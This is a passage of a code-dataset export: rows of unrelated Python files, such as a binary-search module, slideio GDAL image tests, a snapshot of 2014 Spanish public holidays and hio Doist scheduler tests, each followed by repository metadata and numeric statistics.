    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots']['meta_info']

# _meta_info for ...Racks.Rack
@staticmethod
def _meta_info():
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack']['meta_info']

# _meta_info for PlatformFaultManager.Racks
@staticmethod
def _meta_info():
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks']['meta_info']

def clone_ptr(self):
    # YDK hook: provide a fresh top-level entity for CRUD/read operations.
    self._top_entity = PlatformFaultManager()
    return self._top_entity

@staticmethod
def _meta_info():
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager']['meta_info']
| 60.864341 | 460 | 0.379068 | 9,687 | 157,030 | 5.834727 | 0.017859 | 0.081686 | 0.029547 | 0.135029 | 0.971073 | 0.962916 | 0.956512 | 0.94671 | 0.936926 | 0.926541 | 0 | 0.023705 | 0.5468 | 157,030 | 2,579 | 461 | 60.887941 | 0.770508 | 0.135535 | 0 | 0.797101 | 0 | 0.01023 | 0.112209 | 0.060878 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103154 | false | 0 | 0.040921 | 0 | 0.214834 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ab022fd5cebf060cd7795602acf2bc9904d2a27 | 184 | py | Python | imperfect_envs/reacher/envs/__init__.py | Stanford-ILIAD/Learn-Imperfect-Varying-Dynamics | 25191f7b076033ac9dbe8fd08f2a92e3caa57cb3 | [
"MIT"
] | 5 | 2021-03-15T04:07:13.000Z | 2022-03-21T18:58:26.000Z | imperfect_envs/reacher/envs/__init__.py | Stanford-ILIAD/Learn-Imperfect-Varying-Dynamics | 25191f7b076033ac9dbe8fd08f2a92e3caa57cb3 | [
"MIT"
] | null | null | null | imperfect_envs/reacher/envs/__init__.py | Stanford-ILIAD/Learn-Imperfect-Varying-Dynamics | 25191f7b076033ac9dbe8fd08f2a92e3caa57cb3 | [
"MIT"
] | 1 | 2021-11-04T03:19:34.000Z | 2021-11-04T03:19:34.000Z | from reacher.envs.reacher import ReacherCustomEnv
from reacher.envs.reacher import ReacherCustomAction1Env, ReacherCustomAction2Env, ReacherCustomRAction1Env, ReacherCustomRAction2Env
| 61.333333 | 133 | 0.902174 | 15 | 184 | 11.066667 | 0.6 | 0.13253 | 0.180723 | 0.26506 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023121 | 0.059783 | 184 | 2 | 134 | 92 | 0.936416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0a39d1ff6966e81b243aa2917bf0cbb68c3e1cad | 33 | py | Python | problem/10000~19999/16170/16170.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-19T16:37:44.000Z | 2019-04-19T16:37:44.000Z | problem/10000~19999/16170/16170.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-20T11:42:44.000Z | 2019-04-20T11:42:44.000Z | problem/10000~19999/16170/16170.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 3 | 2019-04-19T16:37:47.000Z | 2021-10-25T00:45:00.000Z | print(2018)
print('09')
print(29) | 11 | 11 | 0.69697 | 6 | 33 | 3.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258065 | 0.060606 | 33 | 3 | 12 | 11 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
0a565510a3fb3adb697ac262a3657727c008983c | 2,860 | py | Python | src/bisearch.py | KPRATT11/bisearch | 3357a8e5f7612ed8e6dbd949b60a328b90a36cbf | [
"MIT"
] | 1 | 2020-04-13T05:04:07.000Z | 2020-04-13T05:04:07.000Z | src/bisearch.py | KPRATT11/bisearch | 3357a8e5f7612ed8e6dbd949b60a328b90a36cbf | [
"MIT"
] | null | null | null | src/bisearch.py | KPRATT11/bisearch | 3357a8e5f7612ed8e6dbd949b60a328b90a36cbf | [
"MIT"
] | null | null | null | # --- Binary Search check target exists in field --- #
def exist(target,field):
if isinstance(field, str):
if " " in field:
field = field.split(' ')
field.sort()
else:
field = list(field)
field.sort()
elif isinstance(field, tuple):
field = list(field)
field.sort()
elif isinstance(field, list):
field.sort()
else:
raise TypeError('Must contain a list or string')
upper_range = len(field)
lower_range = 0
if isinstance(target, int) and isinstance(target, float) and isinstance(target, str) == False:
raise TypeError('Search must be either a Int, Float or String')
if target == field[0]:
return True
while True:
try:
finder = ((upper_range - lower_range) / 2) + lower_range
finder = int(finder)
try:
if field[finder] == target:
return True
elif field[finder] > target:
upper_range = finder
elif field[finder] < target:
lower_range = finder
except TypeError:
raise TypeError('Target Type is not compatible with Field Type')
if upper_range - lower_range == 1:
return False
except IndexError:
return False
# --- Binary Search check where a target is located in field--- #
def location(target, field):
    """Return the index of ``target`` in the sorted copy of ``field``.

    ``field`` may be a list, a tuple, or a string (a string containing a
    space is searched word by word, otherwise character by character).
    Returns ``False`` when the target is absent — note that a found index
    of 0 is also falsy, so callers should compare with ``is False``.

    Raises:
        TypeError: if ``field`` is not a list/tuple/str, if ``target`` is
            not an int/float/str, or if ``target`` cannot be compared
            with the elements of ``field``.
    """
    from bisect import bisect_left

    # Normalize the search space to a sorted list.
    if isinstance(field, str):
        field = sorted(field.split(' ') if " " in field else field)
    elif isinstance(field, (tuple, list)):
        field = sorted(field)  # copy: do not mutate the caller's list
    else:
        raise TypeError('Must contain a list or string')
    # BUG FIX: the original guard combined mutually exclusive isinstance()
    # checks with `and`, so it could never fire; validate properly.
    if not isinstance(target, (int, float, str)):
        raise TypeError('Search must be either a Int, Float or String')
    # BUG FIX: an empty field used to raise IndexError at field[0].
    if not field:
        return False
    try:
        index = bisect_left(field, target)
    except TypeError:
        raise TypeError('Target Type is not compatible with Field Type')
    if index < len(field) and field[index] == target:
        return index
    # BUG FIX: the original returned None from one failure path and False
    # from another; the miss result is now consistently False.
    return False
| 26.981132 | 98 | 0.520629 | 302 | 2,860 | 4.870861 | 0.175497 | 0.067981 | 0.057104 | 0.051666 | 0.916383 | 0.912305 | 0.912305 | 0.912305 | 0.912305 | 0.912305 | 0 | 0.005184 | 0.393007 | 2,860 | 105 | 99 | 27.238095 | 0.842166 | 0.03951 | 0 | 0.935065 | 0 | 0 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0 | 0 | 0 | 0.12987 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0a616ed32e75331ea4230cf1510bf221a9295c12 | 9,243 | py | Python | src/pytests/public/test_gdal_driver.py | Booritas/slideio | fdee97747cc73f087a5538aef6a0315ec75becca | [
"BSD-3-Clause"
] | 6 | 2021-01-25T15:21:31.000Z | 2022-03-07T09:23:37.000Z | src/pytests/public/test_gdal_driver.py | Booritas/slideio | fdee97747cc73f087a5538aef6a0315ec75becca | [
"BSD-3-Clause"
] | 3 | 2020-12-30T16:21:42.000Z | 2022-03-07T09:23:18.000Z | src/pytests/public/test_gdal_driver.py | Booritas/slideio | fdee97747cc73f087a5538aef6a0315ec75becca | [
"BSD-3-Clause"
] | null | null | null | """slideio GDAL driver testing."""
import unittest
import pytest
import cv2 as cv
import slideio
import numpy as np
from testlib import get_test_image_path
class TestGDAL(unittest.TestCase):
    """Tests for slideio GDAL driver functionality."""

    def _open_scene(self, image_name):
        """
        Open a GDAL test image and return its only scene.

        Checks the slide-level invariants shared by the tests: the slide
        opens, exposes exactly one scene, and both slide and scene report
        the source file path.
        """
        image_path = get_test_image_path("gdal", image_name)
        slide = slideio.open_slide(image_path, "GDAL")
        self.assertTrue(slide is not None)
        self.assertEqual(1, slide.num_scenes)
        self.assertEqual(image_path, slide.file_path)
        scene = slide.get_scene(0)
        self.assertTrue(scene is not None)
        self.assertEqual(image_path, scene.file_path)
        return scene

    def _check_metadata(self, image_name, channels, width, height,
                        channel_type, compression):
        """Open image_name and verify the scene metadata against the args."""
        scene = self._open_scene(image_name)
        self.assertEqual(channels, scene.num_channels)
        scene_rect = scene.rect
        self.assertEqual(0, scene_rect[0])
        self.assertEqual(0, scene_rect[1])
        self.assertEqual(width, scene_rect[2])
        self.assertEqual(height, scene_rect[3])
        for channel_index in range(scene.num_channels):
            self.assertEqual(channel_type,
                             scene.get_channel_data_type(channel_index))
        self.assertEqual(compression, scene.compression)
        # Plain raster files carry no physical resolution information.
        res = scene.resolution
        self.assertEqual(0, res[0])
        self.assertEqual(0, res[1])

    def _check_color_bars_block(self, scene, **read_kwargs):
        """
        Verify raster statistics of the color-bars test image.

        The rectangle (260, 500, 100, 100) lies inside a solid yellow bar,
        so channels 0 and 1 must be uniformly 255 and channel 2 uniformly 0.
        Extra read_block keyword arguments (e.g. size=...) are passed on.
        """
        block_rect = (260, 500, 100, 100)
        # read 3 channel block
        raster = scene.read_block(block_rect, **read_kwargs)
        mean, stddev = cv.meanStdDev(raster)
        self.assertEqual(mean[0], 255)
        self.assertEqual(stddev[0], 0)
        self.assertEqual(mean[1], 255)
        self.assertEqual(stddev[1], 0)
        self.assertEqual(mean[2], 0)
        self.assertEqual(stddev[2], 0)
        # read one channel block
        raster = scene.read_block(block_rect, channel_indices=[1],
                                  **read_kwargs)
        mean, stddev = cv.meanStdDev(raster)
        self.assertEqual(mean[0], 255)
        self.assertEqual(stddev[0], 0)

    def test_not_existing_file(self):
        """
        Opening of not existing image.

        slideio shall throw RuntimeError
        exception during opening of not existing image.
        """
        with pytest.raises(RuntimeError):
            slideio.open_slide("missing_file.png", "GDAL")

    def test_3chnl_png_metadata(self):
        """Opens 3 channel png file and checks metadata."""
        self._check_metadata("img_2448x2448_3x8bit_SRC_RGB_ducks.png",
                             3, 2448, 2448, np.uint8,
                             slideio.Compression.Png)

    def test_1chnl_png_metadata(self):
        """Opens 1 channel png file and checks metadata."""
        self._check_metadata("img_2448x2448_1x8bit_SRC_GRAY_ducks.png",
                             1, 2448, 2448, np.uint8,
                             slideio.Compression.Png)

    def test_3chnl_png16b_metadata(self):
        """Opens 3 channel 16 bit png file and checks metadata."""
        self._check_metadata("img_2448x2448_3x16bit_SRC_RGB_ducks.png",
                             3, 2448, 2448, np.uint16,
                             slideio.Compression.Png)

    def test_3chnl_jpeg_metadata(self):
        """Opens 3 channel jpeg file and checks metadata."""
        self._check_metadata("Airbus_Pleiades_50cm_8bit_RGB_Yogyakarta.jpg",
                             3, 5494, 5839, np.uint8,
                             slideio.Compression.Jpeg)

    def test_readblock_png8bit(self):
        """Reads an 8 bit png image and checks raster statistics."""
        scene = self._open_scene(
            "img_1024x600_3x8bit_RGB_color_bars_CMYKWRGB.png")
        self._check_color_bars_block(scene)

    def test_resampling_block_png8bit(self):
        """Reads and resamples an 8 bit png image, checks the raster."""
        scene = self._open_scene(
            "img_1024x600_3x8bit_RGB_color_bars_CMYKWRGB.png")
        self._check_color_bars_block(scene, size=(12, 12))

    def test_readblock_png8bit_with(self):
        """Same checks as test_readblock_png8bit, but via context managers."""
        image_path = get_test_image_path(
            "gdal",
            "img_1024x600_3x8bit_RGB_color_bars_CMYKWRGB.png"
        )
        with slideio.open_slide(image_path, "GDAL") as slide:
            self.assertTrue(slide is not None)
            with slide.get_scene(0) as scene:
                self._check_color_bars_block(scene)
if __name__ == '__main__':
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| 38.194215 | 74 | 0.620361 | 1,129 | 9,243 | 4.875111 | 0.115146 | 0.196221 | 0.049419 | 0.039244 | 0.890625 | 0.867914 | 0.852289 | 0.852289 | 0.852289 | 0.852289 | 0 | 0.043327 | 0.285838 | 9,243 | 241 | 75 | 38.352697 | 0.790486 | 0.097155 | 0 | 0.761905 | 0 | 0 | 0.047361 | 0.037028 | 0 | 0 | 0 | 0 | 0.439153 | 1 | 0.042328 | false | 0 | 0.031746 | 0 | 0.079365 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a50a187877409ff3c0388756f713a8f4a9edc1d | 12,382 | py | Python | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 32 | 2019-04-12T08:01:34.000Z | 2022-02-28T04:41:50.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 74 | 2019-07-09T16:35:20.000Z | 2022-03-09T16:41:34.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 20 | 2019-01-28T07:41:02.000Z | 2022-02-16T02:38:57.000Z | [
{
'date': '2014-01-01',
'description': 'Año Nuevo',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-01-06',
'description': 'Epifanía del Señor',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-02-28',
'description': 'Día de Andalucía',
'locale': 'es-ES',
'notes': '',
'region': 'AN',
'type': 'F'
},
{
'date': '2014-03-01',
'description': 'Día de las Illes Balears',
'locale': 'es-ES',
'notes': '',
'region': 'IB',
'type': 'F'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'MC',
'type': 'RF'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'ML',
'type': 'RF'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'NC',
'type': 'RF'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'VC',
'type': 'RF'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'AN',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'AR',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'AS',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CB',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CE',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CL',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CM',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CN',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'EX',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'GA',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'IB',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'MC',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'MD',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'ML',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'NC',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'PV',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'RI',
'type': 'RV'
},
{
'date': '2014-04-18',
'description': 'Viernes Santo',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2014-04-20',
'description': 'Pascua',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'CM',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'NC',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'PV',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'RI',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'VC',
'type': 'RV'
},
{
'date': '2014-04-23',
'description': 'Fiesta de Castilla y León',
'locale': 'es-ES',
'notes': '',
'region': 'CL',
'type': 'F'
},
{
'date': '2014-04-23',
'description': 'San Jorge / Día de Aragón',
'locale': 'es-ES',
'notes': '',
'region': 'AR',
'type': 'RF'
},
{
'date': '2014-05-01',
'description': 'Fiesta del Trabajo',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-05-02',
'description': 'Fiesta de la Comunidad de Madrid',
'locale': 'es-ES',
'notes': '',
'region': 'MD',
'type': 'F'
},
{
'date': '2014-05-17',
'description': 'Día de las Letras Gallegas',
'locale': 'es-ES',
'notes': '',
'region': 'GA',
'type': 'F'
},
{
'date': '2014-05-30',
'description': 'Día de Canarias',
'locale': 'es-ES',
'notes': '',
'region': 'CN',
'type': 'F'
},
{
'date': '2014-06-09',
'description': 'Día de la Región de Murcia',
'locale': 'es-ES',
'notes': '',
'region': 'MC',
'type': 'F'
},
{
'date': '2014-06-09',
'description': 'Día de La Rioja',
'locale': 'es-ES',
'notes': '',
'region': 'RI',
'type': 'F'
},
{
'date': '2014-06-19',
'description': 'Corpus Christi',
'locale': 'es-ES',
'notes': '',
'region': 'CM',
'type': 'RV'
},
{
'date': '2014-06-19',
'description': 'Corpus Christi',
'locale': 'es-ES',
'notes': '',
'region': 'MD',
'type': 'RV'
},
{
'date': '2014-06-24',
'description': 'San Juan',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'RF'
},
{
'date': '2014-07-25',
'description': 'Santiago Apóstol',
'locale': 'es-ES',
'notes': '',
'region': 'CB',
'type': 'RF'
},
{
'date': '2014-07-25',
'description': 'Santiago Apóstol / Día Nacional de Galicia',
'locale': 'es-ES',
'notes': '',
'region': 'GA',
'type': 'RF'
},
{
'date': '2014-08-15',
'description': 'Asunción de la Virgen',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-09-08',
'description': 'Día de Asturias',
'locale': 'es-ES',
'notes': '',
'region': 'AS',
'type': 'F'
},
{
'date': '2014-09-08',
'description': 'Día de Extremadura',
'locale': 'es-ES',
'notes': '',
'region': 'EX',
'type': 'F'
},
{
'date': '2014-09-11',
'description': 'Fiesta Nacional de Cataluña',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'F'
},
{
'date': '2014-09-15',
'description': 'La Bien Aparecida',
'locale': 'es-ES',
'notes': '',
'region': 'CB',
'type': 'RF'
},
{
'date': '2014-10-04',
'description': 'Fiesta del Sacrificio (Aid El Kebir)',
'locale': 'es-ES',
'notes': '',
'region': 'ML',
'type': 'RV'
},
{
'date': '2014-10-06',
'description': 'Fiesta del Sacrificio (Eidul Adha)',
'locale': 'es-ES',
'notes': '',
'region': 'CE',
'type': 'RV'
},
{
'date': '2014-10-09',
'description': 'Día de la Comunitat Valenciana',
'locale': 'es-ES',
'notes': '',
'region': 'VC',
'type': 'F'
},
{
'date': '2014-10-12',
'description': 'Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'AN',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'AR',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'AS',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'CE',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'CL',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'EX',
'type': 'F'
},
{
'date': '2014-10-25',
'description': 'Día del País Vasco-Euskadiko Eguna',
'locale': 'es-ES',
'notes': '',
'region': 'PV',
'type': 'F'
},
{
'date': '2014-11-01',
'description': 'Todos los Santos',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-12-06',
'description': 'Día de la Constitución Española',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-12-08',
'description': 'Inmaculada Concepción',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-12-25',
'description': 'Natividad del Señor',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-12-26',
'description': 'San Esteban',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'RF'
},
{
'date': '2014-12-26',
'description': 'San Esteban',
'locale': 'es-ES',
'notes': '',
'region': 'IB',
'type': 'RF'
}
] | 22.677656 | 72 | 0.37611 | 1,108 | 12,382 | 4.203069 | 0.117329 | 0.116813 | 0.146017 | 0.219025 | 0.824565 | 0.799227 | 0.796865 | 0.715482 | 0.715482 | 0.661799 | 0 | 0.072991 | 0.398078 | 12,382 | 546 | 73 | 22.677656 | 0.551858 | 0 | 0 | 0.648352 | 0 | 0 | 0.406687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a6a33919b929b4945f15a86c5c36d5d5ee13505 | 37,061 | py | Python | tests/base/test_doist.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 1 | 2021-04-07T19:10:28.000Z | 2021-04-07T19:10:28.000Z | tests/base/test_doist.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 4 | 2021-03-30T20:50:19.000Z | 2022-01-06T17:16:18.000Z | tests/base/test_doist.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 3 | 2021-04-08T19:35:36.000Z | 2021-06-03T13:39:05.000Z | # -*- encoding: utf-8 -*-
"""
tests.core.test_cycling module
"""
import pytest
import inspect
from hio.base import doing
from hio.base.basing import State
from hio.base.doing import TryDoer, tryDo
def test_doist():
    """
    Test basic doist
    """
    d = doing.Doist()
    # A freshly constructed Doist exposes its documented defaults.
    assert d.tyme == 0.0  # starts at zero, advances on next cycle
    assert d.tock == 0.03125
    assert d.real == False
    assert d.limit == None
    assert d.doers == []
    # Internal timer duration tracks the doist tock.
    assert d.timer.duration == d.tock
    # Running with all defaults must complete without raising.
    d.do()
    """End Test """
def test_doist_once():
    """
    Test doist.once with deeds
    """
    doist = doing.Doist(tock=0.25)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == 0.25
    assert doist.real == False
    assert doist.limit == None
    assert doist.doers == []

    # Two example doers: doer0 fires every doist cycle (tock 0.25),
    # doer1 every other cycle (tock 0.5).
    doer0 = doing.ExDoer(tock=0.25, tymth=doist.tymen())
    doer1 = doing.ExDoer(tock=0.5, tymth=doist.tymen())
    doers = [doer0, doer1]

    doist.doers = doers
    doist.enter()
    # enter() creates one deed per doer; deed[1] is the retyme (next run tyme)
    assert len(doist.deeds) == 2
    assert [val[1] for val in doist.deeds] == [0.0, 0.0]
    for doer in doers:
        assert doer.states == [State(tyme=0.0, context='enter', feed=0.0, count=0)]
        assert doer.done == False

    # First recur: both doers run; retymes advance by each doer's own tock.
    doist.recur()
    assert doist.tyme == 0.25  # on next cycle
    assert len(doist.deeds) == 2
    assert [val[1] for val in doist.deeds] == [0.25, 0.5]
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1)]
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1)]

    # Second recur: only doer0 is due (doer1's retyme is still 0.5).
    doist.recur()
    assert doist.tyme == 0.5  # on next cycle
    assert len(doist.deeds) == 2
    assert [val[1] for val in doist.deeds] == [0.5, 0.5]
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.25, context='recur', feed=0.25, count=2)]
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1)]

    # Third recur: both due again.
    doist.recur()
    assert doist.tyme == 0.75  # on next cycle
    assert len(doist.deeds) == 2
    assert [val[1] for val in doist.deeds] == [0.75, 1.0]
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.25, context='recur', feed=0.25, count=2),
                            State(tyme=0.5, context='recur', feed=0.5, count=3)]
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.5, context='recur', feed=0.5, count=2)]

    # Fourth recur: doer0 completes (exit context) and its deed is dropped.
    doist.recur()
    assert doist.tyme == 1.0  # on next cycle
    assert len(doist.deeds) == 1
    assert [val[1] for val in doist.deeds] == [1.0]
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.25, context='recur', feed=0.25, count=2),
                            State(tyme=0.5, context='recur', feed=0.5, count=3),
                            State(tyme=0.75, context='recur', feed=0.75, count=4),
                            State(tyme=0.75, context='exit', feed=None, count=5)]
    assert doer0.done == True
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.5, context='recur', feed=0.5, count=2)]

    # Fifth recur: only doer1 remains and runs.
    doist.recur()
    assert doist.tyme == 1.25  # on next cycle
    assert len(doist.deeds) == 1
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.25, context='recur', feed=0.25, count=2),
